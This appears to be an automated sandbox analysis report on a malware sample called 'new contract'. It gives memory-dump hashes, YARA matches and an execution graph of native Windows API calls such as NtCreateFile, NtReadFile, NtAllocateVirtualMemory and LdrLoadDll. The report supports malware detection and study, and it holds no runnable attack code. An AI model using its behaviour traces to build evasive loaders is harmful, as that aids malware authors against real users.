                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 4fbf14b0c27f9c63ba744a99eface30057b1ed6e13cd431cb7e91b8854ecf8b5
                                                                                                                                                                            • Instruction ID: c6bb3a1af7dad8500657ad6d8381ed84f71c410207bf787ec2e14edd7be67cc4
                                                                                                                                                                            • Opcode Fuzzy Hash: 4fbf14b0c27f9c63ba744a99eface30057b1ed6e13cd431cb7e91b8854ecf8b5
                                                                                                                                                                            • Instruction Fuzzy Hash: 90E1F7B4E006198FDB14EFA9C5909AEFBB2FF89304F24C169D819AB355D731A941CF60
                                                                                                                                                                            Function 014BD5BC Relevance: .3, Instructions: 264COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1740410536.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_14b0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 8bdd95464ee7b5240b6419548103e80c598eefb1c61a41844beb647835d9772b
                                                                                                                                                                            • Instruction ID: bde17713de39bfd3b44febfb289263790699b2085dc2d485d305c494f07180af
                                                                                                                                                                            • Opcode Fuzzy Hash: 8bdd95464ee7b5240b6419548103e80c598eefb1c61a41844beb647835d9772b
                                                                                                                                                                            • Instruction Fuzzy Hash: A1A16F36E1020A8FCF05DFB5C8805DEB7B2FF95300B15456BE909AB261DB31E91ACB50
                                                                                                                                                                            Function 07981E18 Relevance: .1, Instructions: 132COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: cd88dcd50b8059ab43eeba55013fbb82a5c25e0d083d4a8a17a22e36028eb4b6
                                                                                                                                                                            • Instruction ID: 6e23b73d1a367378c6823a67ee0efd576e592b9f5a1776db6864a6d1f04315a5
                                                                                                                                                                            • Opcode Fuzzy Hash: cd88dcd50b8059ab43eeba55013fbb82a5c25e0d083d4a8a17a22e36028eb4b6
                                                                                                                                                                            • Instruction Fuzzy Hash: 94510AB5E0021A8BDB14DFA9C5915AEFBF2FF89304F24C169D518AB316D7319942CFA0
                                                                                                                                                                            Function 079819F0 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2a59285d2a819a38e2520b9ac1e7c6431dc46f6c00574b51312a52b42fac81f2
                                                                                                                                                                            • Instruction ID: a154796e0722b3f9e78715813a5d686904f61cb9cb07a9df0cd358c9e8062391
                                                                                                                                                                            • Opcode Fuzzy Hash: 2a59285d2a819a38e2520b9ac1e7c6431dc46f6c00574b51312a52b42fac81f2
                                                                                                                                                                            • Instruction Fuzzy Hash: 4F51FAB5E006198FDB14DFA9C5805AEFBF6BF89304F24C169D418AB315D7319942CFA0

                                                                                                                                                                            Execution Graph

                                                                                                                                                                            Execution Coverage:1.3%
                                                                                                                                                                            Dynamic/Decrypted Code Coverage:2.7%
                                                                                                                                                                            Signature Coverage:5.8%
                                                                                                                                                                            Total number of Nodes:555
                                                                                                                                                                            Total number of Limit Nodes:72
                                                                                                                                                                            execution_graph 97767 41f180 97770 41b930 97767->97770 97771 41b956 97770->97771 97778 409d30 97771->97778 97773 41b962 97774 41b983 97773->97774 97786 40c1b0 97773->97786 97776 41b975 97822 41a670 97776->97822 97825 409c80 97778->97825 97780 409d3d 97781 409d44 97780->97781 97837 409c20 97780->97837 97781->97773 97787 40c1d5 97786->97787 98254 40b1b0 97787->98254 97789 40c22c 98258 40ae30 97789->98258 97791 40c4a3 97791->97776 97792 40c252 97792->97791 98267 414390 97792->98267 97794 40c297 97794->97791 98270 408a60 97794->98270 97796 40c2db 97796->97791 98277 41a4c0 97796->98277 97800 40c331 97801 40c338 97800->97801 98289 419fd0 97800->98289 97802 41bd80 2 API calls 97801->97802 97804 40c345 97802->97804 97804->97776 97806 40c382 97807 41bd80 2 API calls 97806->97807 97808 40c389 97807->97808 97808->97776 97809 40c392 97810 40f490 3 API calls 97809->97810 97811 40c406 97810->97811 97811->97801 97812 40c411 97811->97812 97813 41bd80 2 API calls 97812->97813 97814 40c435 97813->97814 98295 41a020 97814->98295 97817 419fd0 2 API calls 97818 40c470 97817->97818 97818->97791 98300 419de0 97818->98300 97821 41a670 2 API calls 97821->97791 97823 41a68f ExitProcess 97822->97823 97824 41af20 LdrLoadDll 97822->97824 97824->97823 97826 409c93 97825->97826 97876 418b80 LdrLoadDll 97825->97876 97856 418a30 97826->97856 97829 409ca6 97829->97780 97830 409c9c 97830->97829 97859 41b270 97830->97859 97832 409ce3 97832->97829 97870 409aa0 97832->97870 97834 409d03 97877 409620 LdrLoadDll 97834->97877 97836 409d15 97836->97780 97838 409c3a 97837->97838 97839 41b560 LdrLoadDll 97837->97839 98228 41b560 97838->98228 97839->97838 97842 409c61 97844 40f170 97842->97844 97843 41b560 LdrLoadDll 97843->97842 97845 40f189 97844->97845 98236 40b030 97845->98236 97847 40f19c 98240 41a1a0 97847->98240 97850 409d55 97850->97773 97852 40f1c2 97853 40f1ed 97852->97853 98247 41a220 97852->98247 97855 41a450 2 API calls 97853->97855 97855->97850 97878 41a5c0 97856->97878 97860 41b289 97859->97860 97891 414a40 97860->97891 97862 41b2a1 97863 41b2aa 97862->97863 97930 41b0b0 97862->97930 97863->97832 97865 41b2be 97865->97863 97948 419ec0 97865->97948 97873 409aba 97870->97873 98206 407ea0 97870->98206 97872 409ac1 97872->97834 97873->97872 98219 408160 97873->98219 97876->97826 97877->97836 97881 41af20 97878->97881 97880 418a45 97880->97830 97882 41af30 97881->97882 97884 41af52 97881->97884 97885 414e40 97882->97885 97884->97880 97886 414e5a 97885->97886 97887 414e4e 97885->97887 97886->97884 97887->97886 97890 4152c0 LdrLoadDll 97887->97890 97889 414fac 97889->97884 97890->97889 97892 414d75 97891->97892 97893 414a54 97891->97893 97892->97862 97893->97892 97956 419c10 97893->97956 97896 414b80 97959 41a320 97896->97959 97897 414b63 98016 41a420 LdrLoadDll 97897->98016 97900 414b6d 97900->97862 97901 414ba7 97902 41bd80 2 API calls 97901->97902 97905 414bb3 97902->97905 97903 414d39 97904 41a450 2 API calls 97903->97904 97907 414d40 97904->97907 97905->97900 97905->97903 97906 414d4f 97905->97906 97910 414c42 97905->97910 98025 414780 LdrLoadDll NtReadFile NtClose 97906->98025 97907->97862 97909 414d62 97909->97862 97911 414ca9 97910->97911 97913 414c51 97910->97913 97911->97903 97912 414cbc 97911->97912 98018 41a2a0 97912->98018 97915 414c56 97913->97915 97916 414c6a 97913->97916 98017 414640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 97915->98017 97917 414c87 97916->97917 97918 414c6f 97916->97918 97917->97907 97974 414400 97917->97974 97962 4146e0 97918->97962 97923 414c60 97923->97862 97924 414c7d 97924->97862 97926 414d1c 98022 41a450 97926->98022 97927 414c9f 97927->97862 97929 414d28 97929->97862 97931 41b0c1 97930->97931 97932 41b0d3 97931->97932 98043 41bd00 97931->98043 97932->97865 97934 41b0f4 98046 414060 97934->98046 97936 41b140 97936->97865 97937 41b117 97937->97936 97938 414060 3 API calls 97937->97938 97940 41b139 97938->97940 97940->97936 98078 415380 97940->98078 97941 41b1ca 97942 41b1da 97941->97942 98172 41aec0 LdrLoadDll 97941->98172 98088 41ad30 97942->98088 97945 41b208 98167 419e80 97945->98167 97949 41af20 LdrLoadDll 97948->97949 97950 419edc 97949->97950 98200 1662c0a 97950->98200 97951 419ef7 97953 41bd80 97951->97953 97954 41b319 97953->97954 98203 41a630 97953->98203 97954->97832 97957 414b34 97956->97957 97958 41af20 LdrLoadDll 97956->97958 97957->97896 97957->97897 97957->97900 97958->97957 97960 41a33c NtCreateFile 97959->97960 97961 41af20 LdrLoadDll 97959->97961 97960->97901 97961->97960 97963 4146fc 97962->97963 97964 41a2a0 LdrLoadDll 97963->97964 97965 41471d 97964->97965 97966 414724 97965->97966 97967 414738 97965->97967 97969 41a450 2 API calls 97966->97969 97968 41a450 2 API calls 97967->97968 97970 414741 97968->97970 97971 41472d 97969->97971 98026 41bf90 LdrLoadDll RtlAllocateHeap 97970->98026 97971->97924 97973 41474c 97973->97924 97975 41444b 97974->97975 97976 41447e 97974->97976 97978 41a2a0 LdrLoadDll 97975->97978 97977 4145c9 97976->97977 97981 41449a 97976->97981 97980 41a2a0 LdrLoadDll 97977->97980 97979 414466 97978->97979 97982 41a450 2 API calls 97979->97982 97985 4145e4 97980->97985 97983 41a2a0 LdrLoadDll 97981->97983 97984 41446f 97982->97984 97986 4144b5 97983->97986 97984->97927 98039 41a2e0 LdrLoadDll 97985->98039 97988 4144d1 97986->97988 97989 4144bc 97986->97989 97992 4144d6 97988->97992 97993 4144ec 97988->97993 97991 41a450 2 API calls 97989->97991 97990 41461e 97994 41a450 2 API calls 97990->97994 97995 4144c5 97991->97995 97996 41a450 2 API calls 97992->97996 98001 4144f1 97993->98001 98027 41bf50 97993->98027 97997 414629 97994->97997 97995->97927 97998 4144df 97996->97998 97997->97927 97998->97927 98009 414503 98001->98009 98030 41a3d0 98001->98030 98002 414557 98003 41456e 98002->98003 98038 41a260 LdrLoadDll 98002->98038 98004 414575 98003->98004 98005 41458a 98003->98005 98007 41a450 2 API calls 98004->98007 98008 41a450 2 API calls 98005->98008 98007->98009 98010 414593 98008->98010 98009->97927 98011 4145bf 98010->98011 98033 41bb50 98010->98033 98011->97927 98013 4145aa 98014 41bd80 2 API calls 98013->98014 98015 4145b3 98014->98015 98015->97927 98016->97900 98017->97923 98019 414d04 98018->98019 98020 41af20 LdrLoadDll 98018->98020 98021 41a2e0 LdrLoadDll 98019->98021 98020->98019 98021->97926 98023 41a46c NtClose 98022->98023 98024 41af20 LdrLoadDll 98022->98024 98023->97929 98024->98023 98025->97909 98026->97973 98028 41bf68 98027->98028 98040 41a5f0 98027->98040 98028->98001 98031 41af20 LdrLoadDll 98030->98031 98032 41a3ec NtReadFile 98031->98032 98032->98002 98034 41bb74 98033->98034 98035 41bb5d 98033->98035 98034->98013 98035->98034 98036 41bf50 2 API calls 98035->98036 98037 41bb8b 98036->98037 98037->98013 98038->98003 98039->97990 98041 41af20 LdrLoadDll 98040->98041 98042 41a60c RtlAllocateHeap 98041->98042 98042->98028 98173 41a500 98043->98173 98045 41bd2d 98045->97934 98047 414071 98046->98047 98049 414079 98046->98049 98047->97937 98048 41434c 98048->97937 98049->98048 98176 41cef0 98049->98176 98051 4140cd 98052 41cef0 2 API calls 98051->98052 98055 4140d8 98052->98055 98053 414126 98056 41cef0 2 API calls 98053->98056 98055->98053 98057 41d020 3 API calls 98055->98057 98187 41cf90 LdrLoadDll RtlAllocateHeap RtlFreeHeap 98055->98187 98059 41413a 98056->98059 98057->98055 98058 414197 98060 41cef0 2 API calls 98058->98060 98059->98058 98181 41d020 98059->98181 98062 4141ad 98060->98062 98063 4141ea 98062->98063 98066 41d020 3 API calls 98062->98066 98064 41cef0 2 API calls 98063->98064 98065 4141f5 98064->98065 98067 41d020 3 API calls 98065->98067 98073 41422f 98065->98073 98066->98062 98067->98065 98069 414324 98189 41cf50 LdrLoadDll RtlFreeHeap 98069->98189 98071 41432e 98190 41cf50 LdrLoadDll RtlFreeHeap 98071->98190 98188 41cf50 LdrLoadDll RtlFreeHeap 98073->98188 98074 414338 98191 41cf50 LdrLoadDll RtlFreeHeap 98074->98191 98076 414342 98192 41cf50 LdrLoadDll RtlFreeHeap 98076->98192 98079 415391 98078->98079 98080 414a40 8 API calls 98079->98080 98082 4153a7 98080->98082 98081 4153fa 98081->97941 98082->98081 98083 4153e2 98082->98083 98084 4153f5 98082->98084 98085 41bd80 2 API calls 98083->98085 98086 41bd80 2 API calls 98084->98086 98087 4153e7 98085->98087 98086->98081 98087->97941 98193 41abf0 98088->98193 98090 41ad44 98091 41abf0 LdrLoadDll 98090->98091 98092 41ad4d 98091->98092 98093 41abf0 LdrLoadDll 98092->98093 98094 41ad56 98093->98094 98095 41abf0 LdrLoadDll 98094->98095 98096 41ad5f 98095->98096 98097 41abf0 LdrLoadDll 98096->98097 98098 41ad68 98097->98098 98099 41abf0 LdrLoadDll 98098->98099 98100 41ad71 98099->98100 98101 41abf0 LdrLoadDll 98100->98101 98102 41ad7d 98101->98102 98103 41abf0 LdrLoadDll 98102->98103 98104 41ad86 98103->98104 98105 41abf0 LdrLoadDll 98104->98105 98106 41ad8f 98105->98106 98107 41abf0 LdrLoadDll 98106->98107 98108 41ad98 98107->98108 98109 41abf0 LdrLoadDll 98108->98109 98110 41ada1 98109->98110 98111 41abf0 LdrLoadDll 98110->98111 98112 41adaa 98111->98112 98113 41abf0 LdrLoadDll 98112->98113 98114 41adb6 98113->98114 98115 41abf0 LdrLoadDll 98114->98115 98116 41adbf 98115->98116 98117 41abf0 LdrLoadDll 98116->98117 98118 41adc8 98117->98118 98119 41abf0 LdrLoadDll 98118->98119 98120 41add1 98119->98120 98121 41abf0 LdrLoadDll 98120->98121 98122 41adda 98121->98122 98123 41abf0 LdrLoadDll 98122->98123 98124 41ade3 98123->98124 98125 41abf0 LdrLoadDll 98124->98125 98126 41adef 98125->98126 98127 41abf0 LdrLoadDll 98126->98127 98128 41adf8 98127->98128 98129 41abf0 LdrLoadDll 98128->98129 98130 41ae01 98129->98130 98131 41abf0 LdrLoadDll 98130->98131 98132 41ae0a 98131->98132 98133 41abf0 LdrLoadDll 98132->98133 98134 41ae13 98133->98134 98135 41abf0 LdrLoadDll 98134->98135 98136 41ae1c 98135->98136 98137 41abf0 LdrLoadDll 98136->98137 98138 41ae28 98137->98138 98139 41abf0 LdrLoadDll 98138->98139 98140 41ae31 98139->98140 98141 41abf0 LdrLoadDll 98140->98141 98142 41ae3a 98141->98142 98143 41abf0 LdrLoadDll 98142->98143 98144 41ae43 98143->98144 98145 41abf0 LdrLoadDll 98144->98145 98146 41ae4c 98145->98146 98147 41abf0 LdrLoadDll 98146->98147 98148 41ae55 98147->98148 98149 41abf0 LdrLoadDll 98148->98149 98150 41ae61 98149->98150 98151 41abf0 LdrLoadDll 98150->98151 98152 41ae6a 98151->98152 98153 41abf0 LdrLoadDll 98152->98153 98154 41ae73 98153->98154 98155 41abf0 LdrLoadDll 98154->98155 98156 41ae7c 98155->98156 98157 41abf0 LdrLoadDll 98156->98157 98158 41ae85 98157->98158 98159 41abf0 LdrLoadDll 98158->98159 98160 41ae8e 98159->98160 98161 41abf0 LdrLoadDll 98160->98161 98162 41ae9a 98161->98162 98163 41abf0 LdrLoadDll 98162->98163 98164 41aea3 98163->98164 98165 41abf0 LdrLoadDll 98164->98165 98166 41aeac 98165->98166 98166->97945 98168 41af20 LdrLoadDll 98167->98168 98169 419e9c 98168->98169 98199 1662df0 LdrInitializeThunk 98169->98199 98170 419eb3 98170->97865 98172->97942 98174 41af20 LdrLoadDll 98173->98174 98175 41a51c NtAllocateVirtualMemory 98174->98175 98175->98045 98177 41cf00 98176->98177 98178 41cf06 98176->98178 98177->98051 98179 41bf50 2 API calls 98178->98179 98180 41cf2c 98179->98180 98180->98051 98182 41cf90 98181->98182 98183 41bf50 2 API calls 98182->98183 98184 41cfed 98182->98184 98185 41cfca 98183->98185 98184->98059 98186 41bd80 2 API calls 98185->98186 98186->98184 98187->98055 98188->98069 98189->98071 98190->98074 98191->98076 98192->98048 98194 41ac0b 98193->98194 98195 414e40 LdrLoadDll 98194->98195 98196 41ac2b 98195->98196 98197 414e40 LdrLoadDll 98196->98197 98198 41acd7 98196->98198 98197->98198 98198->98090 98198->98198 98199->98170 98201 1662c11 98200->98201 98202 1662c1f LdrInitializeThunk 98200->98202 98201->97951 98202->97951 98204 41af20 LdrLoadDll 98203->98204 98205 41a64c RtlFreeHeap 98204->98205 98205->97954 98207 407eb0 98206->98207 98208 407eab 98206->98208 98209 41bd00 2 API calls 98207->98209 98208->97873 98210 407ed5 98209->98210 98211 407f38 98210->98211 98212 419e80 2 API calls 98210->98212 98213 407f3e 98210->98213 98217 41bd00 2 API calls 98210->98217 98222 41a580 98210->98222 98211->97873 98212->98210 98215 407f64 98213->98215 98216 41a580 2 API calls 98213->98216 98215->97873 98218 407f55 98216->98218 98217->98210 98218->97873 98220 40817e 98219->98220 98221 41a580 2 API calls 98219->98221 98220->97834 98221->98220 98223 41a59c 98222->98223 98224 41af20 LdrLoadDll 98222->98224 98227 1662c70 LdrInitializeThunk 98223->98227 98224->98223 98225 41a5b3 98225->98210 98227->98225 98229 41b583 98228->98229 98232 40ace0 98229->98232 98233 40ad04 98232->98233 98234 40ad40 LdrLoadDll 98233->98234 98235 409c4b 98233->98235 98234->98235 98235->97842 98235->97843 98237 40b053 98236->98237 98239 40b0d0 98237->98239 98252 419c50 LdrLoadDll 98237->98252 98239->97847 98241 41af20 LdrLoadDll 98240->98241 98242 40f1ab 98241->98242 98242->97850 98243 41a790 98242->98243 98244 41a7af LookupPrivilegeValueW 98243->98244 98245 41af20 LdrLoadDll 98243->98245 98244->97852 98245->98244 98248 41a23c 98247->98248 98249 41af20 LdrLoadDll 98247->98249 98253 1662ea0 LdrInitializeThunk 98248->98253 98249->98248 98250 41a25b 98250->97853 98252->98239 98253->98250 98255 40b1e0 98254->98255 98256 40b030 LdrLoadDll 98255->98256 98257 40b1f4 98256->98257 98257->97789 98259 40ae41 98258->98259 98260 40ae3d 98258->98260 98261 40ae5a 98259->98261 98262 40ae8c 98259->98262 98260->97792 98305 419c90 LdrLoadDll 98261->98305 98306 419c90 LdrLoadDll 98262->98306 98264 40ae9d 98264->97792 98266 40ae7c 98266->97792 98268 40f490 3 API calls 98267->98268 98269 4143b6 98267->98269 98268->98269 98269->97794 98271 408a79 98270->98271 98307 4087a0 98270->98307 98273 4087a0 19 API calls 98271->98273 98276 408a9d 98271->98276 98274 408a8a 98273->98274 98274->98276 98325 40f700 10 API calls 98274->98325 98276->97796 98278 41af20 LdrLoadDll 98277->98278 98279 41a4dc 98278->98279 98444 1662e80 LdrInitializeThunk 98279->98444 98280 40c312 98282 40f490 98280->98282 98283 40f4ad 98282->98283 98445 419f80 98283->98445 98286 40f4f5 98286->97800 98287 419fd0 2 API calls 98288 40f51e 98287->98288 98288->97800 98290 419fe5 98289->98290 98291 41af20 LdrLoadDll 98290->98291 98292 419fec 98291->98292 98451 1662d10 LdrInitializeThunk 98292->98451 98293 40c375 98293->97806 98293->97809 98296 41af20 LdrLoadDll 98295->98296 98297 41a03c 98296->98297 98452 1662d30 LdrInitializeThunk 98297->98452 98298 40c449 98298->97817 98301 41af20 LdrLoadDll 98300->98301 98302 419dfc 98301->98302 98453 1662fb0 LdrInitializeThunk 98302->98453 98303 40c49c 98303->97821 98305->98266 98306->98264 98308 407ea0 4 API calls 98307->98308 98322 4087ba 98308->98322 98309 408a49 98309->98271 98310 408a3f 98311 408160 2 API calls 98310->98311 98311->98309 98314 419ec0 2 API calls 98314->98322 98318 40c4b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 98318->98322 98321 419de0 2 API calls 98321->98322 98322->98309 98322->98310 98322->98314 98322->98318 98322->98321 98323 41a450 LdrLoadDll NtClose 98322->98323 98326 419cd0 98322->98326 98329 4085d0 98322->98329 98341 40f5e0 LdrLoadDll NtClose 98322->98341 98342 419d50 LdrLoadDll 98322->98342 98343 419d80 LdrLoadDll 98322->98343 98344 419e10 LdrLoadDll 98322->98344 98345 4083a0 98322->98345 98361 405f60 LdrLoadDll 98322->98361 98323->98322 98325->98276 98327 419cec 98326->98327 98328 41af20 LdrLoadDll 98326->98328 98327->98322 98328->98327 98330 4085e6 98329->98330 98362 419840 98330->98362 98332 4085ff 98333 408771 98332->98333 98383 4081a0 98332->98383 98333->98322 98335 4086e5 98335->98333 98336 4083a0 11 API calls 98335->98336 98337 408713 98336->98337 98337->98333 98338 419ec0 2 API calls 98337->98338 98339 408748 98338->98339 98339->98333 98340 41a4c0 2 API calls 98339->98340 98340->98333 98341->98322 98342->98322 98343->98322 98344->98322 98346 4083c9 98345->98346 98423 408310 98346->98423 98349 41a4c0 2 API calls 98350 4083dc 98349->98350 98350->98349 98351 408467 98350->98351 98353 408462 98350->98353 98431 40f660 98350->98431 98351->98322 98352 41a450 2 API calls 98354 40849a 98352->98354 98353->98352 98354->98351 98355 419cd0 LdrLoadDll 98354->98355 98356 4084ff 98355->98356 98356->98351 98435 419d10 98356->98435 98358 408563 98358->98351 98359 414a40 8 API calls 98358->98359 98360 4085b8 98359->98360 98360->98322 98361->98322 98363 41bf50 2 API calls 98362->98363 98364 419857 98363->98364 98390 409310 98364->98390 98366 419872 98367 4198b0 98366->98367 98368 419899 98366->98368 98371 41bd00 2 API calls 98367->98371 98369 41bd80 2 API calls 98368->98369 98370 4198a6 98369->98370 98370->98332 98372 4198ea 98371->98372 98373 41bd00 2 API calls 98372->98373 98374 419903 98373->98374 98380 419ba4 98374->98380 98396 41bd40 98374->98396 98377 419b90 98378 41bd80 2 API calls 98377->98378 98379 419b9a 98378->98379 98379->98332 98381 41bd80 2 API calls 98380->98381 98382 419bf9 98381->98382 98382->98332 98384 40829f 98383->98384 98385 4081b5 98383->98385 98384->98335 98385->98384 98386 414a40 8 API calls 98385->98386 98387 408222 98386->98387 98388 41bd80 2 API calls 98387->98388 98389 408249 98387->98389 98388->98389 98389->98335 98391 409335 98390->98391 98392 40ace0 LdrLoadDll 98391->98392 98393 409368 98392->98393 98395 40938d 98393->98395 98399 40cf10 98393->98399 98395->98366 98417 41a540 98396->98417 98400 40cf3c 98399->98400 98401 41a1a0 LdrLoadDll 98400->98401 98402 40cf55 98401->98402 98403 40cf5c 98402->98403 98410 41a1e0 98402->98410 98403->98395 98407 40cf97 98408 41a450 2 API calls 98407->98408 98409 40cfba 98408->98409 98409->98395 98411 41a1fc 98410->98411 98412 41af20 LdrLoadDll 98410->98412 98416 1662ca0 LdrInitializeThunk 98411->98416 98412->98411 98413 40cf7f 98413->98403 98415 41a7d0 LdrLoadDll 98413->98415 98415->98407 98416->98413 98418 41af20 LdrLoadDll 98417->98418 98419 41a55c 98418->98419 98422 1662f90 LdrInitializeThunk 98419->98422 98420 419b89 98420->98377 98420->98380 98422->98420 98424 408328 98423->98424 98425 40ace0 LdrLoadDll 98424->98425 98426 408343 98425->98426 98427 414e40 LdrLoadDll 98426->98427 98428 408353 98427->98428 98429 40835c PostThreadMessageW 98428->98429 98430 408370 98428->98430 98429->98430 98430->98350 98432 40f673 98431->98432 98438 419e50 98432->98438 98436 41af20 LdrLoadDll 98435->98436 98437 419d2c 98436->98437 98437->98358 98439 419e6c 98438->98439 98440 41af20 LdrLoadDll 98438->98440 98443 1662dd0 LdrInitializeThunk 98439->98443 98440->98439 98441 40f69e 98441->98350 98443->98441 98444->98280 98446 41af20 LdrLoadDll 98445->98446 98447 419f9c 98446->98447 98450 1662f30 LdrInitializeThunk 98447->98450 98448 40f4ee 98448->98286 98448->98287 98450->98448 98451->98293 98452->98298 98453->98303 98457 1662ad0 LdrInitializeThunk

                                                                                                                                                                            Executed Functions

                                                                                                                                                                            Function 0041A3D0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 0 41a3d0-41a419 call 41af20 NtReadFile
                                                                                                                                                                            APIs
                                                                                                                                                                            • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A415
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_new contract.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                            • String ID: !JA$bMA$bMA
                                                                                                                                                                            • API String ID: 2738559852-4222312340
                                                                                                                                                                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                                            • Instruction ID: 54437c4e75339082d0912fbe7e6c9053912bd6928cda1a9760da43cab1c95c7d
                                                                                                                                                                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                                            • Instruction Fuzzy Hash: C3F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241D630E8518BA4
                                                                                                                                                                            Function 0041A2DA Relevance: 1.6, APIs: 1, Instructions: 70filenativeCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 208 41a2da-41a2db 209 41a2dd-41a319 call 41af20 208->209 210 41a31e-41a371 call 41af20 NtCreateFile 208->210
                                                                                                                                                                            APIs
                                                                                                                                                                            • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A36D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_new contract.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                            • Opcode ID: 0ea889096db265b473ee1470c5806ee9c5d231ad54aca8319adbd717bc589d4c
                                                                                                                                                                            • Instruction ID: b8eec153ef1fd2cb2105d6bf2324f222409db7b37a7476c19455854edcf70504
                                                                                                                                                                            • Opcode Fuzzy Hash: 0ea889096db265b473ee1470c5806ee9c5d231ad54aca8319adbd717bc589d4c
                                                                                                                                                                            • Instruction Fuzzy Hash: DE11E2B2205208AFDB08DF89DC85EEB77ADEF8C754F158249FA1D97241C630E851CBA4
                                                                                                                                                                            Function 0040ACE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 246 40ace0-40acfc 247 40ad04-40ad09 246->247 248 40acff call 41cc10 246->248 249 40ad0b-40ad0e 247->249 250 40ad0f-40ad1d call 41d030 247->250 248->247 253 40ad2d-40ad3e call 41b460 250->253 254 40ad1f-40ad2a call 41d2b0 250->254 259 40ad40-40ad54 LdrLoadDll 253->259 260 40ad57-40ad5a 253->260 254->253 259->260
                                                                                                                                                                            APIs
                                                                                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_new contract.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Load
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2234796835-0
                                                                                                                                                                            • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                                                                                                                                                            • Instruction ID: 93036d1b31c8ba6342ae8de3f2893f5930aff37f33252288d1eb8296453bc5b5
                                                                                                                                                                            • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                                                                                                                                                            • Instruction Fuzzy Hash: FF015EB5E0020DABDB10EBA1DC42FDEB3789F14308F0041AAE908A7281F634EB54CB95
                                                                                                                                                                            Function 0041A320 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
